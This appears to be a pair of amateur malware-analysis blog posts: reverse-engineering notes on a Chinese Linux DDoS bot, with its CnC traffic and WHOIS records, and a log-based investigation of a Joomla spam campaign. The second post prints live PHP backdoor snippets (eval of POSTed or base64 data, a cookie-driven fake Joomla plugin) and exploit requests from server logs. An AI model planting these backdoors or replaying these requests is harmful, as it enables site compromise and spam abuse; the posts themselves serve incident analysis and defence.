            0x08048136    56           push esi
            0x08048137    681ca70408   push sym.main ; 0x0804a71c
            0x0804813c    e8cf390800   call sym.__libc_start_main
               0x080cbb10(unk, unk, unk, unk, unk, unk, unk, unk) ; sym.__libc_start_main
            0x08048141    f4           hlt
            0x08048142    90           nop
            0x08048143    90           nop

// Chinese does appear quite often through the binary, this ties in with the chinese source that these were obtained from.
// Not sure where this katakana on the first line came from though... - Yinette

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG 
0x0075693  B4CUNG
0x0102520  i18n:1999
  :

// config:
0x00E5C22  fake.cfg
// template:
%d
%d.%d.%d.%d:%d.%d.%d.%d
%d:%d

// poc:
# cat fake.cfg
0
YOUR-IP-HERE:AND-HERE
10000:60000

// Obtain IP of interface with the default route and write it to fake.cfg:

getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0


//Does a DNS Query for www.baidu.com against google's open resolvers at 8.8.8.8 (To test for internet reachability)

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74

// compile/compat traces:

0x0124CC0  GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)
0x0124CED  GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)

// Sources:

 'crtstuff.c'
 'Fake.cpp'
 'Global.cpp'
 'main.cpp'
 'Manager.cpp'
 'ProtocolUtil.cpp'
 'ServerIP.cpp'
 'StatBase.cpp'
 'ThreadAttack.cpp'
 'ThreadAttackKernal.cpp'
 'ThreadHostStatus.cpp'
 'ThreadTaskManager.cpp'
 'ThreadTimer.cpp'
 'AutoLock.cpp'
 'FileOp.cpp'
 'Log.cpp'
 'Md5.cpp'
 'Media.cpp'
 'NetBase.cpp'
 'ThreadCondition.cpp'
 'Thread.cpp'
 'ThreadMutex.cpp'
 'Utility.cpp'

// The ThreadAttack.cpp file in particular provides key functions for some
// nasty looking attacks:

CThreadAttack::ProcessMain(void)
CThreadAttack::EmptyConnectionAtk(CSubTask &)
CThreadAttack::HttpAtk(CSubTask &) 
CThreadAttack::FakeUserAtk(CSubTask &)
CThreadAttack::Stop(void)  
CThreadAttack::DomainInitEx(CRandArray &,char  const*)  
CThreadAttack::DomainRandEx(CRandArray &,int &) 
CThreadAttack::CrossPkt(int) 
CThreadAttack::~CThreadAttack() 
CThreadAttack::CThreadAttack(CManager *)
CThreadAttack::Start(CCmdMessage *)
CThreadAttack::InitCrossPkts(std::vector..
CThreadAttack::PktAtk(CSubTask &,std::vector http [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=895351513 TSecr=0 WS=128
180.76.3.151    x.x.x.x TCP 74  http > 48417 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1440 SACK_PERM=1
x.x.x.x 180.76.3.151    TCP 54  48417 > http [RST] Seq=1 Win=0 Len=0

// 2. Send data back to CnC:

x.x.x.x 61.147.103.21   TCP 455 33911 > 54460 [PSH, ACK] Seq=1 Ack=1 Win=14720 Len=401

00000000  b8 0b 00 00 00 4e 2e 25  45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
00000010  ea 4c 69 6e 75 78 20 33  2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
00000020  6d 64 36 34 00 00 00 00  00 00 00 00 00 00 00 00 md64.... ........
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000190  00                                               .

----
#MalwareMustDie!
/* This analysis post is dedicated to all UNIX sysadmins */

Full copy here: http://pastebin.com/949Y8a3g

Domain and IP analysis

Interestingly (or not), the attack in this instance came from the same IP that we saw hosting the files and the same IP that is the CNC. The system itself appears to be a machine hosted out of Jiangsu Provence, China.

Here’s what we could see on the web-based file explorer:

(photo supplied by MalwareMustDie)

After I had retrieved MOST of the files, it appears they noticed and then deleted everything (hey guys! lol)

There is a domain pointing to our CNC,Hosting,Attack IP (as evident in our massive shell script) pingyan-china.com

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name:pingyan-china.com
Registry Domain ID:
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:http://www.xinnet.com
Updated Date:2013-09-30 00:38:42
Creation Date:2013-09-30 00:33:31
Registrar Registration Expiration Date:2014-09-30 00:33:31
Registrar:XINNET TECHNOLOGY CORPORATION
Registrar IANA ID:120
Registrar Abuse Contact Email:supervision@xinnet.com
Registrar Abuse Contact Phone:+86.1087128064
Domain Status:ok
Registry Registrant ID:
Registrant Name:Wang ShanShi
Registrant Organization:fdgf fggh
Registrant Street:gghjkj  ddfgh dddf
Registrant City:chengdu
Registrant State/Province:Sichuan
Registrant Postal Code:310400
Registrant Country:China
Registrant Phone:+86.028 89908908
Registrant Phone Ext:
Registrant Fax:+86.028 78789090
Registrant Fax Ext:
Registrant Email:280954460@qq.com
Registry Admin ID:
Admin Name:fdgf fggh
Admin Organization:fdgf fggh
Admin Street:gghjkj  ddfgh dddf
Admin City:chengdu
Admin State/Province:Sichuan
Admin PostalCode:310400
Admin Country:China
Admin Phone:+86.028 89908908
Admin Phone Ext:
Admin Fax:+86.028 78789090
Admin Fax Ext:
Admin Email:280954460@qq.com
Registry Tech ID:
Tech Name:fdgf fggh
Tech Organization:fdgf fggh
Tech Street:gghjkj  ddfgh dddf
Tech City:chengdu
Tech State/Province:Sichuan
Tech PostalCode:310400
Tech Country:China
Tech Phone:+86.028 89908908
Tech Phone Ext:
Tech Fax:+86.028 78789090
Tech Fax Ext:
Tech Email:280954460@qq.com
Name Server:dxdns.ybnic.com
Name Server:dxdns2.ybnic.com
Name Server:ltdns.ybnic.com
Name Server:gwdns.ybnic.com
DNSSEC:unsigned

As you can see in the whois, this is likely to not be a legitimate registration, unless Wang Shanshi works at a company called ‘fdgf fggh’ at the address of ‘gghjkj ddfgh dddf, Sichuan, CN.’

(Or Mr Shanshi is a lazy bastard at typing.)

Google couldn’t help me with that one…

The IP 61.147.103.21 itself is familiar to me:

inetnum:        61.147.0.0 - 61.147.255.255
netname:        CHINANET-JS
descr:          CHINANET jiangsu province network
descr:          China Telecom
descr:          A12,Xin-Jie-Kou-Wai Street
descr:          Beijing 100088
country:        CN
admin-c:        CH93-AP
tech-c:         CJ186-AP
mnt-by:         MAINT-CHINANET
mnt-lower:      MAINT-CHINANET-JS
mnt-routes:     maint-chinanet-js
changed:        hostmaster@ns.chinanet.cn.net 20020209
changed:        hostmaster@ns.chinanet.cn.net 20030306
status:         ALLOCATED non-PORTABLE
source:         APNIC

role:           CHINANET JIANGSU
address:        260 Zhongyang Road,Nanjing 210037
country:        CN
phone:          +86-25-86588231
phone:          +86-25-86588745
fax-no:         +86-25-86588104
e-mail:         ip@jsinfo.net
remarks:        send anti-spam reports to spam@jsinfo.net
remarks:        send abuse reports to abuse@jsinfo.net
remarks:        times in GMT+8
admin-c:        CH360-AP
tech-c:         CS306-AP
tech-c:         CN142-AP
nic-hdl:        CJ186-AP
remarks:        www.jsinfo.net
notify:         ip@jsinfo.net
mnt-by:         MAINT-CHINANET-JS
changed:        dns@jsinfo.net 20090831
changed:        ip@jsinfo.net 20090831
changed:        hm-changed@apnic.net 20090901
source:         APNIC
changed:        hm-changed@apnic.net 20111114

person:         Chinanet Hostmaster
nic-hdl:        CH93-AP
e-mail:         anti-spam@ns.chinanet.cn.net
address:        No.31 ,jingrong street,beijing
address:        100032
phone:          +86-10-58501724
fax-no:         +86-10-58501724
country:        CN
changed:        dingsy@cndata.com 20070416
changed:        zhengzm@gsta.com 20140227
mnt-by:         MAINT-CHINANET
source:         APNIC

This doesn’t surprise me, ranges in the 61.147.0.0/16 are known for malicious traffic. In particular I’ve spotted the entire 61.147.51.0/24 range SSH Brute-Forcing a lot of IPs at once. Someone has some serious resources going into this shit.

Quick Update!

Seems after deleting everything off their webserver, they decided to upload something new.

Check out the following VirusTotal Result and MMD’s comments with some quick RE notes :)

https://www.virustotal.com/en/file/6dd946e821df59705dcfeb79fab810336d0ee497fd715fb5b6711e05c0428f4d/analysis/

It seems for this DDoS binary to run properly, it needs root access on the host system. This is why it is trying to root the system it has targeted.

More to come!

Thanks to:

MalwareMustDie for ELF Analysis and Research.

These random chinese guys for leaving their toys for me to find :)

My work for allowing me to do cool shit like this for a hobby.

I59

i59 – a story of spammers, pornography, and really old joomla exploits

Last year, there was a similar campaign also using Joomla sites as well as Wordpress to send spam. It was officially known as “Rodecap”, you can find a good write up on it here: http://www.abuse.ch/?tag=rodecap What made it unusual was that the IPs that were hitting the Malicious PHP script were in fact infected Windows boxes. This one, which I’m calling i59 (due to absence of any other name) appears to be the replacement for our old friend rodecap. It’s called i59 due to the extensive use of the $i59 variable within the script.

This was mostly uncovered using log diving, grep, and a shitload of caffeine.

Please note the filenames here are what I discovered in this particular instance of an i59 infection. It seems each case has a different place where things are stored, named, etc.

Anything i’ve got wrong, please let me know! I’ve had very ample time to properly look into this…

The story begins, initial vector

It appears that this all started around the 24/25th of May 2014, the exploit in question is this one: http://www.exploit-db.com/exploits/17995/ – From my research, it looks like this has already been patched by the nonumber developer.

188.208.33.18 - - [24/May/2014:03:25:01 +1000] "POST /index.php?nn_qp=1&url=http://5.34.177.110/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:04 +1000] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:06 +1000] "POST /components/a.php HTTP/1.1" 200 143 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:08 +1000] "GET /components/4idf49.php HTTP/1.1" 200 62084 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

The IP 5.34.177.110 doesn’t respond to anything at the moment. Either it was withdrawn or destroyed, but the IP belongs to a Hosting mob from Ukraine, to be specific, the town of Kharkiv. This looks as if it would have had the remote shell, however without the full POST data I cannot tell for sure.

Secondly, our First actor 188.208.33.18 from Romania is always the IP that injects and establishes the foothold on the Joomla site it has infected.

The first thing it puts on the site is a basic PHP script that can be used to gather some information:

md5: 305038e2f82471a683ccdd71078a02d9

# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

5.34.177.110    FALSE   /about/ FALSE   0       <?eval(stripslashes(array_pop($_POST)))>       1

Seems to also carry some meta-data.

From there it will have already uploaded the next stage:

md5: ad354405da14c4cdc5957cc84bc2ee49

/**
 * @package     Joomla.Plugin.System
 * @since       1.5
 *
 *
 */
class PlgSysJoomla {
public function __construct() {
$file=@$_COOKIE['Jlma3'];
if ($file){ $opt=$file(@$_COOKIE['Jlma2']); $au=$file(@$_COOKIE['Jlma1']); $opt("/292/e",$au,292); die();} else {phpinfo();die;}}}

Sneaky fecker pretends to be a part of Joomla. Romania’s role here is to just make sure it returns the phpinfo…

About a week later, Romania comes back and throws some stuff at our fake joomla component:

188.208.33.18 - - [06/Jul/2014:21:45:47 +1000] "POST /components/4idf49.php HTTP/1.1" 200 70 "http://www.google.com" "Mozilla/7.0 (Windows XP 6.1; rv:12.1) Gecko/2014 Firefox/11.1"

This is where the next file is born…

md5sum: 7fdd8a13ae5c0a3ee2713e8c3ddf39d4

Look at the attached file ‘395adn.php’

I haven’t had time to properly dissect this, but I’m sure someone out there would like to. Mostly from inference, guessing and experience, this appears to be a webshell and a file uploader.

From here, there is a bit of silence, It’s possible that this was just the foothold that would be sold-on to whoever wanted a lot of joomla sites to do naughty things with… Might be interesting to see what sort of chatter was going on in the Russian cybercrim forums around this time.

So a month later, we meet a new actor:

37.139.47.122 - - [07/Jul/2014:22:06:04 +1000] "GET /components/com_podcastmedia/395adn.php HTTP/1.1" 200 106 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:06 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 2214 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:09 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 3360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

our friend 37.139.47.122 is from St. Petersburg Russia.

He immediately will upload his back doors, as well as spread a whole bunch of shit around. I like to call this the ‘arse spraying mayhem’


37.139.47.122 - - [07/Jul/2014:22:06:23 +1000] "POST /libraries/getid3/module.audio.bonk.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:27 +1000] "POST /modules/mod_banners/mod_banners.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:41 +1000] "POST /modules/mod_articles_archive/mod_articles_archive.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:54 +1000] "POST /components/com_banners/models/search.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:56 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:58 +1000] "POST /libraries/cms/view/db.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:00 +1000] "POST /components/com_sh404sef/system.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:02 +1000] "POST /media/mediaelements/js/list.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:04 +1000] "POST /libraries/joomla/installer/ajax.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:06 +1000] "POST /media/editors/codemirror/object.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:08 +1000] "POST /components/com_k2/controllers/title.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:10 +1000] "POST /modules/mod_feed/tmpl/help.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:12 +1000] "POST /components/com_mailto/helpers/alias.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:14 +1000] "POST /components/com_content/controllers/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:16 +1000] "POST /plugins/search/contacts/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:18 +1000] "POST /media/system/css/proxy.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:20 +1000] "POST /components/com_jce/options.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:23 +1000] "POST /modules/mod_footer/tmpl/gallery.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:25 +1000] "POST /templates/view.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:27 +1000] "POST /components/com_mailto/themes.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:31 +1000] "POST /logs/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:33 +1000] "POST /libraries/phputf8/utils/page.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

POSTs are to confirm everything is there and working.

This basically puts this into a bunch of files, as well as into the top of some already existing files:

eval(base64_decode($_POST['ne0080b']));

Effectively giving this bot leverage to execute arbitrary PHP from any of it’s several ‘mini backdoors’

This IP will also be responsible for maintaining the bot, and making sure that it can still get in.

I’ve also observed this thing messing with file modification times, so it was kinda tricky to properly link this all together.

a few days pass…

37.139.47.243 - - [11/Jul/2014:06:45:48 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 185 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

This is where the star of the show is born… i59!

md5sum: 71a7c769e644d8cf3cf32419239212c7

again, i59 is something I haven’t had the time to properly dissect, even though it is the star of the show, it’s kept me more busy trying to track its ass down and stop the machine it has infected from being RBL’d for trying to spam Porno links to everyone on AOL and Yahoo.

But this is the component that sends the spam, as evident in the following log snippet:

66.33.212.107 - - [25/Jul/2014:02:53:20 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:58:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2558 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2577 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:43 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:30 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
91.121.12.223 - - [25/Jul/2014:03:09:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:38 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5164 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4871 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:16 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
74.220.219.67 - - [25/Jul/2014:03:13:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.56.213 - - [25/Jul/2014:03:14:51 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:37 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1058 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3203 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:47 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3188 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:42 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:54 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3975 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:17 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.153 - - [25/Jul/2014:03:24:02 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2302 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:44 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2899 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3394 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:19 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2509 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:27 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
199.168.99.123 - - [25/Jul/2014:03:36:12 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
141.105.121.139 - - [25/Jul/2014:03:41:00 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:45 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3894 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2186 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
